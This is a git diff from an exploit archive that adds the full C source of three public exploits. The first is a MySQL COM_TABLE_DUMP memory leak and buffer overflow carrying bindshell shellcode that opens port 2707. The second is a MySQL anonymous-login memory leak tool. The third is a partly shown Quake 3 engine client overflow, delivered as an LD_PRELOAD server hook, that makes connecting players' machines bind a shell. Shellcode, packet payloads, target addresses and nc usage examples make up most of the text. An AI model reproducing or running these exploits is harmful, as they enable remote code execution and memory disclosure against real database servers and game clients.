' ' : '\n')); - } - } - else - { - printf ("\n%s\n", buf + 5); - } -// printf("\nSending to client\n"); -// ret= send(c, buf, ret, 0); - - return 0; -} - -usage () -{ - printf - ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n\ --H: this Help;\n\ --i: Information leak exploit (shows the content of MySql Server Memory)\n\ --x: shows c/s communication output in hexadecimal\n\ --t: hexadecimal table_list struct address (by default we try to find it automatically)\n\ --a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n\ --u: mysql username (anonymous too ;)\n\ --p: mysql userpass (if you need it)\n\ --s: the socket path if is a unix socket\n\ --h: hostname or IP address\n\ --P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\n\n\ -Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\n\n\ - "); - -} - -int -main (int argc, char *argv[]) -{ - - int fdest = 0; - int port = 3306; - int shell = 1; - int force_table = 0; - char buf1[65535]; - char *socket; - char *user = NULL; - char *pass = NULL; - char *host = NULL; - socket = strdup ("/tmp/mysql2.sock"); - opterr = 0; - - while ((c = getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) != -1) - switch (c) - { - case 's': - socket = (char *) optarg; - break; - case 't': - force_table = 1; - tbl = (int) strtol (optarg, NULL, 16); - //tbl=atoi( optarg ); - break; - case 'a': - thd = (int) strtol (optarg, NULL, 16); - break; - case 'u': - user = (char *) optarg; - break; - case 'p': - pass = (char *) optarg; - break; - case 'P': - port = atoi (optarg); - break; - case 'h': - host = (char *) optarg; - break; - case 'i': - shell = 0; - break; - case 'x': - hexdump = 1; - break; - case 'H': - usage (); - return 1; - default: - break; - } - - if (!force_table) - tbl = thd + 0x1f548; - conn = mysql_init (NULL); - int ret = mysql_real_connect 
(conn, /* pointer to connection handler */ - host, /* host to connect to */ - user, /* user name */ - pass, /* password */ - NULL, /* database to use */ - 0, /* port (use default) */ - socket, /* socket (use default) */ - 0); /* flags (none) */ - - if (!ret) - { - fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn)); - return 1; - } - printf ("using table_list:%x thread:%x\n", tbl, thd); - - fd = conn->net.fd; - - if (shell) - { - d = 2; - sendit (buf1, fdest, -1); - d = 3; - sendit (buf1, fdest, -1); - d = 3; - sendit (buf1, fdest, -1); - } - else - { - int l; - d = 3; - for (l = 0; l < 256; l++) - { - sendit (buf1, fdest, l); - } - } - mysql_close (conn); - - exit (0); -} - -// milw0rm.com [2006-05-02] +/* **************************************************************** + + April 21.st 2006 + + my_exploit.c + + MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f + + MySql <= 5.0.20 + + MySql COM_TABLE_DUMP Memory Leak + + MySql <= 4.x.x + + copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) + + GPL 2.0 + **************************************************************** + + Disclaimer: + + In no event shall the author be liable for any damages + whatsoever arising out of or in connection with the use + or spread of this information. + Any use of this information is at the user's own risk. 
+ + **************************************************************** + + compile with: + gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit + + Then: + + my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x] + + -H: this Help; + -i: Information leak exploit (shows the content of MySql Server Memory) + -x: shows c/s communication output in hexadecimal + -t: hexadecimal table_list struct address (by default we try to find it automatically) + -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338) + -u: mysql username (anonymous too ;) + -p: mysql userpass (if you need it) + -s: the socket path if is a unix socket + -h: hostname or IP address + -P: port (default 3306) + + + Example_1 - Memoryleak: my_exploit -s socketpath -u username -i + + Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 + + For memory leak: + + my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]] + + For the bindshell to port 2707 + my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]] + + then from another shell: + nc 127.0.0.1 2707 + id + uid=78(mysql) gid=78(mysql) groups=78(mysql) + + + +*/ + +#include +#include +#include + + + +// we need to know the thread struct address pointer and the table_list. +// these are defaults, change them from command line. +int thd = 0x8b1b338; +int tbl = 0x8b3a880; + +#define USOCK2 "/tmp/mysql.sock" + +char addr_tdh[4]; +char addr_tbl[4]; +char addr_ret[4]; + +// constants to overwrite packet with addresses for table_list thread and our shell. 
+#define TBL_POS 182 +#define THD_POS 178 +#define RET_POS 174 +#define SHL_POS 34 + +// bindshell spawns a shell with on port 2707 +char shcode[] = { + 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12 + ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1 + ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80 + ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0 + ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80 + ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f + ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84 +}; + +int tmp_idx = 0; + +int dump_packet_len = 7; +char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 }; + +int payload_len = 371; +// header packet + select '1234567890...etc' +char query_payload[] = { + 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ... 
+ , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32 + , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48 + , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64 + , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72 + , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88 + , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94 + , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112 + , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118 + , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144 + , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160 + , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176 + , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75 // 192 178 + , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 224 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 240 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 256 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 272 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 288 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 
0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x27 +}; // 16*23+3 = 371 + + + + +static int s = 0, c = 0; +int fd = 0; +int d = 1; +int hexdump = 0; +char buf[65535]; + + +MYSQL *conn; /* pointer to connection handler */ + + +int +sendit (char *buf1, int fdest, int dblen) +{ + int len1; + int i = 0; + int ret = 0; + printf ("%d\n", d); + if (d == 2) + { + // let's prepare the query packet + int o; + int position = 14; + + tmp_idx = 3; + + + int ret = tbl - 0x106 + 33; + + for (i = 0; i < 32; i += 8) + addr_ret[tmp_idx--] = (ret >> i) & 0xff; + + tmp_idx = 3; + for (i = 0; i < 32; i += 8) + addr_tdh[tmp_idx--] = (thd >> i) & 0xff; + + tmp_idx = 3; + for (i = 0; i < 32; i += 8) + addr_tbl[tmp_idx--] = (tbl >> i) & 0xff; + printf ("ret %x\n", ret); + + +#if 1 + tmp_idx = 0; + for (o = THD_POS; o > THD_POS - 4; o--) + query_payload[o] = addr_tdh[tmp_idx++]; + + tmp_idx = 0; + for (o = TBL_POS; o > TBL_POS - 4; o--) + query_payload[o] = addr_tbl[tmp_idx++]; + + tmp_idx = 0; + for (o = RET_POS; o > RET_POS - 4; o--) + query_payload[o] = addr_ret[tmp_idx++]; +#else + for (; position < payload_len - 12; position += 12) + { + tmp_idx = 0; + printf ("p:%d\n", position); + for (o = position + 4; o > position; o--) + query_payload[o] = addr_ret[tmp_idx++]; + + tmp_idx = 0; + for (o = position + 8; o > position + 4; o--) + query_payload[o] = addr_tdh[tmp_idx++]; + + tmp_idx = 0; + for (o = position + 12; o > position + 8; o--) + query_payload[o] = addr_tbl[tmp_idx++]; + + } + +#endif + + tmp_idx = 0; + for (o = SHL_POS; o < SHL_POS + 84; o++) + query_payload[o] = shcode[tmp_idx++]; + + printf ("entro\n"); + buf1 = query_payload; + len1 = payload_len; + } + else if (d >= 3) + { + printf 
("entro\n"); + + // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73) + buf1 = table_dump_packet; + if (dblen >= 0) + buf1[5] = (char) dblen; + printf ("%x", (char) dblen); + len1 = dump_packet_len; + } + d++; + + printf ("\nClient -> Server\n"); + if (hexdump) + { + for (i = 0; i < len1; i++) + printf (" %.2x%c", (unsigned char) buf1[i], + ((i + 1) % 16 ? ' ' : '\n')); + printf ("\n"); + for (i = 0; i < len1; i++) + { + unsigned char f = (unsigned char) buf1[i]; + printf (" %.2c%2c", (isprint (f) ? f : '.'), + (((i + 1) % 16) ? ' ' : '\n')); + } + } + if (send (fd, buf1, len1, 0) != len1) + { + perror ("cli: send(buf3)"); + exit (1); + } + + + + fdest = fd; + + memset (buf, 0, 65535); + ret = recv (fdest, buf, 65535, 0); + printf ("\nServer -> Client\n"); + if (hexdump) + { + for (i = 0; i < ret; i++) + printf (" %.2x%c", (unsigned char) buf[i], + ((i + 1) % 16 ? ' ' : '\n')); + printf ("\n"); + for (i = 0; i < ret; i++) + { + unsigned char f = (unsigned char) buf[i]; + printf (" %.2c%2c", (isprint (f) ? f : '.'), + ((i + 1) % 16 ? 
' ' : '\n')); + } + } + else + { + printf ("\n%s\n", buf + 5); + } +// printf("\nSending to client\n"); +// ret= send(c, buf, ret, 0); + + return 0; +} + +usage () +{ + printf + ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n\ +-H: this Help;\n\ +-i: Information leak exploit (shows the content of MySql Server Memory)\n\ +-x: shows c/s communication output in hexadecimal\n\ +-t: hexadecimal table_list struct address (by default we try to find it automatically)\n\ +-a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n\ +-u: mysql username (anonymous too ;)\n\ +-p: mysql userpass (if you need it)\n\ +-s: the socket path if is a unix socket\n\ +-h: hostname or IP address\n\ +-P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\n\n\ +Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\n\n\ + "); + +} + +int +main (int argc, char *argv[]) +{ + + int fdest = 0; + int port = 3306; + int shell = 1; + int force_table = 0; + char buf1[65535]; + char *socket; + char *user = NULL; + char *pass = NULL; + char *host = NULL; + socket = strdup ("/tmp/mysql2.sock"); + opterr = 0; + + while ((c = getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) != -1) + switch (c) + { + case 's': + socket = (char *) optarg; + break; + case 't': + force_table = 1; + tbl = (int) strtol (optarg, NULL, 16); + //tbl=atoi( optarg ); + break; + case 'a': + thd = (int) strtol (optarg, NULL, 16); + break; + case 'u': + user = (char *) optarg; + break; + case 'p': + pass = (char *) optarg; + break; + case 'P': + port = atoi (optarg); + break; + case 'h': + host = (char *) optarg; + break; + case 'i': + shell = 0; + break; + case 'x': + hexdump = 1; + break; + case 'H': + usage (); + return 1; + default: + break; + } + + if (!force_table) + tbl = thd + 0x1f548; + conn = mysql_init (NULL); + int ret = mysql_real_connect 
(conn, /* pointer to connection handler */ + host, /* host to connect to */ + user, /* user name */ + pass, /* password */ + NULL, /* database to use */ + 0, /* port (use default) */ + socket, /* socket (use default) */ + 0); /* flags (none) */ + + if (!ret) + { + fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn)); + return 1; + } + printf ("using table_list:%x thread:%x\n", tbl, thd); + + fd = conn->net.fd; + + if (shell) + { + d = 2; + sendit (buf1, fdest, -1); + d = 3; + sendit (buf1, fdest, -1); + d = 3; + sendit (buf1, fdest, -1); + } + else + { + int l; + d = 3; + for (l = 0; l < 256; l++) + { + sendit (buf1, fdest, l); + } + } + mysql_close (conn); + + exit (0); +} + +// milw0rm.com [2006-05-02] diff --git a/platforms/linux/remote/1742.c b/platforms/linux/remote/1742.c index 5eae9e660..ea0d41961 100755 --- a/platforms/linux/remote/1742.c +++ b/platforms/linux/remote/1742.c 
@@ -1,227 +1,227 @@ -/* **************************************************************** - - April 21.st 2006 - - my_anon_db_leak.c - - MySql Anonimous Login Memory Leak - - MySql <= 5.0.20 - - MySql <= 4.1.x - - copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) - - GPL 2.0 - **************************************************************** - - Disclaimer: - - In no event shall the author be liable for any damages - whatsoever arising out of or in connection with the use - or spread of this information. - Any use of this information is at the user's own risk. - - **************************************************************** - Compile with: - gcc my_anon_db_leak.c -o my_anon_db_leak - - usage: - my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len] - - -*/ - - -#include -/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2 -have MSG_WAITALL in its ?? -*/ - -#ifdef __linux__ -#include -#else -#include -#endif -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include /* sockaddr_in{} and other Internet defns */ -#include /* needed by gethostbyname */ -#include /* needed by inet_ntoa */ - - -char anon_pckt[] = { - 0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a, - 0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73, - 0x00 -}; // len=16*4+1=65; - - -int anon_pckt_len = 65; - -#define USOCK "/tmp/mysql2.sock" - -int -tcp_conn (char *hostname, int port) -{ - - int sockfd; - int n; - struct sockaddr_in servaddr; - - struct hostent *hp; - - - - if ((hp = gethostbyname (hostname)) == 0) - { - perror ("gethostbyname"); - exit (0); - } - - if ((sockfd = socket (AF_INET, SOCK_STREAM, 
0)) < 0) - { - perror ("socket"); - exit (1); - } - - bzero ((char *) &servaddr, sizeof (servaddr)); - servaddr.sin_family = AF_INET; - servaddr.sin_port = htons (port); - - memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length); - if (servaddr.sin_addr.s_addr <= 0) - { - perror ("bad address after gethostbyname"); - exit (1); - } - if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0) - { - perror ("connect"); - exit (1); - } - return sockfd; -} - -int -unix_conn (char *path) -{ - int fd, len; - struct sockaddr_un sa; - - fd = socket (PF_UNIX, SOCK_STREAM, 0); - - if (fd < 0) - { - perror ("cli: socket(PF_UNIX,SOCK_STREAM)"); - exit (1); - } - - sa.sun_family = AF_UNIX; - strcpy (sa.sun_path, path); - len = sizeof (sa); - if (connect (fd, (struct sockaddr *) &sa, len) < 0) - { - perror ("cli: connect()"); - exit (1); - } - return fd; -} - -int -main (int argc, char *argv[]) -{ - int fd; - int i, ret; - char packet[65535]; - char *path; - char *host; - int port = 3306; - char buf[65535]; - int db_len = 0; - int pckt_len = anon_pckt_len; - int unix_sock = 1; - char c; - - path = strdup (USOCK); - host = strdup ("127.0.0.1"); - - opterr = 0; - - while ((c = getopt (argc, argv, "s:h:p:n:")) != -1) - switch (c) - { - case 's': - path = strdup (optarg); - unix_sock = 1; - break; - case 'h': - host = strdup (optarg); - unix_sock = 0; - break; - case 'p': - port = atoi (optarg); - unix_sock = 0; - break; - case 'n': - db_len = atoi (optarg); - break; - - default: - break; - } - - - bzero (packet, 65535); - - pckt_len = anon_pckt_len + db_len; - printf ("%d\n", pckt_len); - - for (i = 0; i < pckt_len; i++) - packet[i] = anon_pckt[i]; - - if (db_len) - for (i = anon_pckt_len - 2; i < pckt_len; i++) - packet[i] = 'A'; - - packet[pckt_len - 1] = '\0'; - - packet[0] = (char) (anon_pckt[0] + db_len) & 0xff; - packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff; - for (i = 0; i < pckt_len; i++) - printf (" %.2x%c", (unsigned char) packet[i], - ((i + 1) 
% 16 ? ' ' : '\n')); - printf ("\n"); - - - if (unix_sock) - fd = unix_conn (path); - else - fd = tcp_conn (host, port); - - sleep (1); - ret = recv (fd, buf, 65535, 0); - if (send (fd, packet, pckt_len, 0) != pckt_len) - { - perror ("cli: send(anon_pckt)"); - exit (1); - } - - ret = recv (fd, buf, 65535, 0); - for (i = 0; i < ret; i++) - printf ("%c", (isalpha (buf[i]) ? buf[i] : '.')); - printf ("\n"); - return 0; -} - -// milw0rm.com [2006-05-02] +/* **************************************************************** + + April 21.st 2006 + + my_anon_db_leak.c + + MySql Anonimous Login Memory Leak + + MySql <= 5.0.20 + + MySql <= 4.1.x + + copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) + + GPL 2.0 + **************************************************************** + + Disclaimer: + + In no event shall the author be liable for any damages + whatsoever arising out of or in connection with the use + or spread of this information. + Any use of this information is at the user's own risk. + + **************************************************************** + Compile with: + gcc my_anon_db_leak.c -o my_anon_db_leak + + usage: + my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len] + + +*/ + + +#include +/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2 +have MSG_WAITALL in its ?? 
+*/ + +#ifdef __linux__ +#include +#else +#include +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include /* sockaddr_in{} and other Internet defns */ +#include /* needed by gethostbyname */ +#include /* needed by inet_ntoa */ + + +char anon_pckt[] = { + 0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a, + 0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73, + 0x00 +}; // len=16*4+1=65; + + +int anon_pckt_len = 65; + +#define USOCK "/tmp/mysql2.sock" + +int +tcp_conn (char *hostname, int port) +{ + + int sockfd; + int n; + struct sockaddr_in servaddr; + + struct hostent *hp; + + + + if ((hp = gethostbyname (hostname)) == 0) + { + perror ("gethostbyname"); + exit (0); + } + + if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) + { + perror ("socket"); + exit (1); + } + + bzero ((char *) &servaddr, sizeof (servaddr)); + servaddr.sin_family = AF_INET; + servaddr.sin_port = htons (port); + + memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length); + if (servaddr.sin_addr.s_addr <= 0) + { + perror ("bad address after gethostbyname"); + exit (1); + } + if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0) + { + perror ("connect"); + exit (1); + } + return sockfd; +} + +int +unix_conn (char *path) +{ + int fd, len; + struct sockaddr_un sa; + + fd = socket (PF_UNIX, SOCK_STREAM, 0); + + if (fd < 0) + { + perror ("cli: socket(PF_UNIX,SOCK_STREAM)"); + exit (1); + } + + sa.sun_family = AF_UNIX; + strcpy (sa.sun_path, path); + len = sizeof (sa); + if (connect (fd, (struct sockaddr *) &sa, len) < 0) + { + perror ("cli: connect()"); + exit (1); + } + return fd; +} + +int +main (int argc, char *argv[]) +{ + int fd; + 
int i, ret; + char packet[65535]; + char *path; + char *host; + int port = 3306; + char buf[65535]; + int db_len = 0; + int pckt_len = anon_pckt_len; + int unix_sock = 1; + char c; + + path = strdup (USOCK); + host = strdup ("127.0.0.1"); + + opterr = 0; + + while ((c = getopt (argc, argv, "s:h:p:n:")) != -1) + switch (c) + { + case 's': + path = strdup (optarg); + unix_sock = 1; + break; + case 'h': + host = strdup (optarg); + unix_sock = 0; + break; + case 'p': + port = atoi (optarg); + unix_sock = 0; + break; + case 'n': + db_len = atoi (optarg); + break; + + default: + break; + } + + + bzero (packet, 65535); + + pckt_len = anon_pckt_len + db_len; + printf ("%d\n", pckt_len); + + for (i = 0; i < pckt_len; i++) + packet[i] = anon_pckt[i]; + + if (db_len) + for (i = anon_pckt_len - 2; i < pckt_len; i++) + packet[i] = 'A'; + + packet[pckt_len - 1] = '\0'; + + packet[0] = (char) (anon_pckt[0] + db_len) & 0xff; + packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff; + for (i = 0; i < pckt_len; i++) + printf (" %.2x%c", (unsigned char) packet[i], + ((i + 1) % 16 ? ' ' : '\n')); + printf ("\n"); + + + if (unix_sock) + fd = unix_conn (path); + else + fd = tcp_conn (host, port); + + sleep (1); + ret = recv (fd, buf, 65535, 0); + if (send (fd, packet, pckt_len, 0) != pckt_len) + { + perror ("cli: send(anon_pckt)"); + exit (1); + } + + ret = recv (fd, buf, 65535, 0); + for (i = 0; i < ret; i++) + printf ("%c", (isalpha (buf[i]) ? buf[i] : '.')); + printf ("\n"); + return 0; +} + +// milw0rm.com [2006-05-02] diff --git a/platforms/linux/remote/1750.c b/platforms/linux/remote/1750.c index 55f1a9bc5..a0c4ba95e 100755 --- a/platforms/linux/remote/1750.c +++ b/platforms/linux/remote/1750.c 
@@ -1,245 +1,245 @@
-// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit
-// by landser - landser at hotmail.co.il
-//
-// this code works as a preloaded shared library on a game server,
-// it hooks two functions on the running server:
-// svc_directconnect() that is called when a client connects,
-// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients.
-// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message.
-//
-// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro)
-// (win32 clients are vuln too but not included here)
-//
-// usage:
-// gcc remap_this.c -shared -fPIC -o remap_this.so
-// and run a server with env LD_PRELOAD="./remap_this.so"
-//
-// -----------------------------------------------------
-// [luser@box ~/wolfenstein]$ LD_PRELOAD="./remap_this.so" ./wolfded.x86 +set net_port 5678 +map mp_beach
-// remap_this.c by landser - landser at hotmail.co.il
-//
-// game: RtCW 1.41 Dedicated.
-// [...]
-// directconnect(): 10.0.0.4 connected
-// sendservercommand() called
-// sendservercommand() called
-// sendservercommand() called
-// [...]
-// [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv
-// sus4 [10.0.0.4] 27670 (?) open
-// id
-// uid=1000(luser) gid=100(lusers)
-// -----------------------------------------------------
-//
-// visit www.nixcoders.org for open source linux cheats
-
-#define _GNU_SOURCE
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define SILENT // hide the crappy server output
-#define PORT 27670 // bindshell port. 
some values are invalid
-
-struct netaddr { // from q3-1.32b/qcommon/qcommon.h
- int type;
- unsigned char ip[4];
- unsigned char ipx[10];
- unsigned short port;
-};
-
-struct {
- char *name;
- char *fn;
- unsigned long retaddr; // something that jumps to %esp
- unsigned long sendservercommand; // address of sv_sendservercommand()
- unsigned long directconnect; // address of svc_directconnect()
- int hooklen; // for both sendservercommand and directconnect
- unsigned long errormsg; // address of error string
- unsigned long comerror; // address of com_error()
- int popas; // num of popa instructions before shellcode
- int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction
-} games[] = {
- {"ET 2.60 Dedicated", "etded",
- 0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12},
- {"RtCW 1.41 Dedicated", "wolfded",
- 0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12},
- {"Quake 3 1.32b Dedicated", "q3ded",
- 0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27},
-};
-
-const int ngames = sizeof(games) / sizeof(games[0]);
-const unsigned short int port = PORT;
-
-static void *hook (void *, int, void *);
-static void sendservercommand (void *, const char *, ...);
-static void directconnect (struct netaddr);
-static void writebuf (void);
-
-void (*_sendservercommand)(void *, const char *, ...);
-void (*_directconnect)(struct netaddr);
-
-int c = -1;
-unsigned char buf[1024];
-
-// shellcode (286 bytes):
-// fork()s,
-// the parent proc calls com_error() with an error message (errormsg var),
-// the child proc binds a shell on a chosen port
-// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80
-unsigned char sc[] =
- "\x68\x03\x5a\x70\x50\x58\x05\x01\x01\x7b\x71\x50\x68\x57\x50\x7f\x69"
- "\x58\x05\x01\x7d\x01\x01\x50\x68\x70\x30\x6a\x06\x58\x66\x05\x7b\x76"
- "\x50\x68\x54\x5b\x52\x53\x68\x2f\x62\x69\x6e\x68\x2f\x73\x68\x68\x68"
- 
